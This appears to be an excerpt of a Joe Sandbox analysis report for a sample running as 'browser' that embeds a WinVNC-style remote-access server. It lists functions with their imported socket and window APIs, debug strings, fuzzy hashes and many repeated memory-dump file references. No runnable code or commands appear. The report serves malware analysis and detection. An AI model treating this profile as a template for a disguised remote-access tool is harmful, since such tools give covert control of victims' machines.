Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ProcessWindow$CurrentFindMessagePostThread
String ID: WinVNC Tray Icon
API String ID: 2660421340-1071638575
Opcode ID: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
Instruction ID: 372c028cb1420b5e28c14d7a0c26ca95123693c779853f4d3746a71a36fb3b50
Opcode Fuzzy Hash: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
Instruction Fuzzy Hash: C8018621618B8181E764AB72B8444A6F7B0FF89BD4F945039DE4D03B65EE7CE485C710

Function 00007FF790C533A0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF790C533D3

Strings

vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash , xrefs: 00007FF790C53490
vncclient.cpp : DSMPlugin Pointer to socket OK, xrefs: 00007FF790C53429
vncclient.cpp : failed to set socket timeout(%d), xrefs: 00007FF790C533D9
vncclient.cpp : Invalid DSMPlugin Pointer, xrefs: 00007FF790C53502

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID: vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash $vncclient.cpp : DSMPlugin Pointer to socket OK$vncclient.cpp : Invalid DSMPlugin Pointer$vncclient.cpp : failed to set socket timeout(%d)
API String ID: 1452528299-2001727811
Opcode ID: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
Instruction ID: b5a25bacd5b4af59dcbdae2130ba4441937e62b5da636ab241011fc5d13753f2
Opcode Fuzzy Hash: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
Instruction Fuzzy Hash: 9341F96AA19A4581EB60AF36D0883FC67A0FB85F44F889071CE0D473A4DF3DE485D360

Function 00007FF790C588A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00007FF790C588F0
inet_ntoa.WS2_32 ref: 00007FF790C588FA

Part of subcall function 00007FF790CE92A4: malloc.LIBCMT ref: 00007FF790CE92C7

Part of subcall function 00007FF790CE7978: malloc.LIBCMT ref: 00007FF790CE7992

InitializeCriticalSection.KERNEL32 ref: 00007FF790C5894B

Part of subcall function 00007FF790CC79A0: EnterCriticalSection.KERNEL32 ref: 00007FF790CC79C7
Part of subcall function 00007FF790CC79A0: LeaveCriticalSection.KERNEL32 ref: 00007FF790CC79E9
Part of subcall function 00007FF790CC79A0: CreateSemaphoreA.KERNEL32 ref: 00007FF790CC7A03
Part of subcall function 00007FF790CC79A0: GetLastError.KERNEL32 ref: 00007FF790CC7A15

Strings

<unavailable>, xrefs: 00007FF790C58900

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$malloc$CreateEnterErrorInitializeLastLeaveSemaphoregetpeernameinet_ntoa
String ID: <unavailable>
API String ID: 4131039871-1096956887
Opcode ID: 662e7cd3472f8606c1dbc32a9fae7d2c30d9cf2075c004d535a59fbb274039f5
Instruction ID: 866d493a0c8c6a2ab7e94e6836ecd0629c2db7b927416f3bee0205a56ec7b3a5
Opcode Fuzzy Hash: 662e7cd3472f8606c1dbc32a9fae7d2c30d9cf2075c004d535a59fbb274039f5
Instruction Fuzzy Hash: 7B313A32628B8182EB64EF34E8443A9B3A4FB89BA4F940235DA9D47794DF3CE455C750

Function 00007FF790C9CD40 Relevance: 6.1, APIs: 4, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00007FF790C9CD7A
gethostbyname.WS2_32 ref: 00007FF790C9CD8C
htons.WS2_32 ref: 00007FF790C9CDB1
connect.WS2_32 ref: 00007FF790C9CDCB

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: connectgethostbynamehtonsinet_addr
String ID:
API String ID: 599670773-0
Opcode ID: f6108e8ca93ccc89ffbbcef9ae7f28c2dc192bc10360c91e264abe9a68236526
Instruction ID: 32c9e7167bafb238ec23af669f342ef753254254196f20da18e069efd8966884
Opcode Fuzzy Hash: f6108e8ca93ccc89ffbbcef9ae7f28c2dc192bc10360c91e264abe9a68236526
Instruction Fuzzy Hash: 8711B962A28A0181EB74AB31E840279B3B0FF89B95F805235EA5E47794EF3CE400C724

Function 00007FF790CE7978 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_callnewh.LIBCMT ref: 00007FF790CE7986
malloc.LIBCMT ref: 00007FF790CE7992

Part of subcall function 00007FF790CE8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF790CE8C64
Part of subcall function 00007FF790CE8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF790CF329C,?,?,?,00007FF790CF7749,?,?,?,00007FF790CF77F3), ref: 00007FF790CE8C89
Part of subcall function 00007FF790CE8C34: _callnewh.LIBCMT ref: 00007FF790CE8CA2
Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CAD
Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CB8

Strings

bad allocation, xrefs: 00007FF790CE79CF

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _callnewh_errno$AllocHeapmalloc
String ID: bad allocation
API String ID: 3727741168-2104205924
Opcode ID: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
Instruction ID: 0738b8d6b63d2d89c244963e4c27762ec242b534c7042d9d169360ce05a2b95a
Opcode Fuzzy Hash: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
Instruction Fuzzy Hash: 78012A25A2D74791EA30BB30A8950F8A3A4BF45380FC42231D54D867A2EE6CF545DB20

Function 00007FF790C9A290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32 ref: 00007FF790C9A2C2
PostMessageA.USER32 ref: 00007FF790C9A2E8

Strings

WinVNC Tray Icon, xrefs: 00007FF790C9A2B9

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: FindMessagePostWindow
String ID: WinVNC Tray Icon
API String ID: 2578315405-1071638575
Opcode ID: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
Instruction ID: 35023537790652ad2692f5737cce929a44c1808747b4c50262eefde3db7f4a8f
Opcode Fuzzy Hash: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
Instruction Fuzzy Hash: 4A018825E38A41C1EB649732F440265A2A0FF48BC4F885031EE5E53755DE7CF4918B00

Function 00007FF790C9CC40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

shutdown.WS2_32 ref: 00007FF790C9CC70
closesocket.WS2_32 ref: 00007FF790C9CC7A

Strings

vsocket.cpp : closing socket, xrefs: 00007FF790C9CC4F

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: closesocketshutdown
String ID: vsocket.cpp : closing socket
API String ID: 572888783-2569437896
Opcode ID: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
Instruction ID: 048bcb5e0f1640c94291ecca0bdee1e72d8e3d561fe6d554a47fc4ab51b63414
Opcode Fuzzy Hash: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
Instruction Fuzzy Hash: E5F037B5A20A4282EB24AF74C4942A9B320FF89B15FA05635C92E463D5DF38E4568360

Function 00007FF790C9DD90 Relevance: 4.6, APIs: 3, Instructions: 86networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00007FF790C9DE1D
__WSAFDIsSet.WS2_32 ref: 00007FF790C9DE5D
send.WS2_32 ref: 00007FF790C9DE78

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: selectsend
String ID:
API String ID: 2999949978-0
Opcode ID: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
Instruction ID: b4eebc2a1370b1fe4bb9e86a0563c66adfdc1dfb858e2ee03a57e6fba5349020
Opcode Fuzzy Hash: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
Instruction Fuzzy Hash: AF310532A38A8246EA706B35A8447FAF3A0BF86798F841130DD5D17B50EF3DF8418620

Function 00007FF790CF9234 Relevance: 4.5, APIs: 3, Instructions: 46memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF790CF9257
HeapAlloc.KERNEL32(?,?,00000000,00007FF790CF331F,?,?,?,00007FF790CF37F7,?,?,?,00007FF790CEFFD1), ref: 00007FF790CF928B
_callnewh.LIBCMT ref: 00007FF790CF92A2

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: AllocHeap_callnewh_errno
String ID:
API String ID: 849339952-0
Opcode ID: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
Instruction ID: 91cb8d61ecad297ea1366699e4232ccf46121fb4f68de60fa3a1f20bddf47c27
Opcode Fuzzy Hash: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
Instruction Fuzzy Hash: 0011C611F2D24299FF756B3196557B8F2E1EF427A0F884630CB1D46BC5DE2CF4408222

Function 00007FF790C44140 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

SendMessageA.USER32 ref: 00007FF790C441C0
FreeLibrary.KERNELBASE(?,?,?,00007FF790C44124), ref: 00007FF790C441CF

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: FreeLibraryMessageSend
String ID:
API String ID: 3583424976-0
Opcode ID: 3711d45541c1e93da4d37315846025d5885e52d672c3b20f65361b0611ceea0c
Instruction ID: 88e71c9eb6d4da12d0b8afbd534f7751154d19c5d1f78d5f185689339656dd48
Opcode Fuzzy Hash: 3711d45541c1e93da4d37315846025d5885e52d672c3b20f65361b0611ceea0c
Instruction Fuzzy Hash: 72115A25F2A542A5FE79FFB180656BCA365AFA5B44F941231CE0E02781CE2CF881C321

Function 00007FF790C9CBC0 Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FF790C9CBE6

Part of subcall function 00007FF790C9CC40: shutdown.WS2_32 ref: 00007FF790C9CC70
Part of subcall function 00007FF790C9CC40: closesocket.WS2_32 ref: 00007FF790C9CC7A

setsockopt.WS2_32 ref: 00007FF790C9CC16

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: closesocketsetsockoptshutdownsocket
String ID:
API String ID: 3513852771-0
Opcode ID: 7d480c3a304c4e2f7ccf6cbbfd7f0a840315250e84bbd90c940829d90bbae2b2
Instruction ID: 35d379e0f770bbce1b3a2bac47e44a9103a504c9a8d912e5e8332e004642a29a
Opcode Fuzzy Hash: 7d480c3a304c4e2f7ccf6cbbfd7f0a840315250e84bbd90c940829d90bbae2b2
Instruction Fuzzy Hash: F7F0C2B2A2820387EB20BF34D4513B5B360BF46705F940634DA2C863D0EB7DE1958A20

Function 00007FF790C9D170 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FF790C9D1AA
setsockopt.WS2_32 ref: 00007FF790C9D1D1

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
Instruction ID: b12e85447a2000c1539807550ca2cd46b60b9eea3f862f7da746e9743d2a6416
Opcode Fuzzy Hash: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
Instruction Fuzzy Hash: AEF09672A2418243E7319F70D4042BAE3A1FF85725F540A31DAAD86BD4DBBCD19A8B10

Function 00007FF790C9D1F0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00007FF790C9D20D

Part of subcall function 00007FF790C9DD90: select.WS2_32 ref: 00007FF790C9DE1D

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CountTickselect
String ID:
API String ID: 2475007269-0
Opcode ID: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
Instruction ID: f0438249864bcc53d8431369989a018b81ef5d5d4e3b22fc14b1b8ced5e4d4bf
Opcode Fuzzy Hash: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
Instruction Fuzzy Hash: 0531C13272464186EB14EF31E5841EDB762EB8AF84F498139CF1D5B789EE38E8458770

Function 00007FF790CF32EC Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF790CF9234: _errno.LIBCMT ref: 00007FF790CF9257

Sleep.KERNEL32(?,?,?,00007FF790CF37F7,?,?,?,00007FF790CEFFD1,?,?,?,?,00007FF790CE8C19), ref: 00007FF790CF3331

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
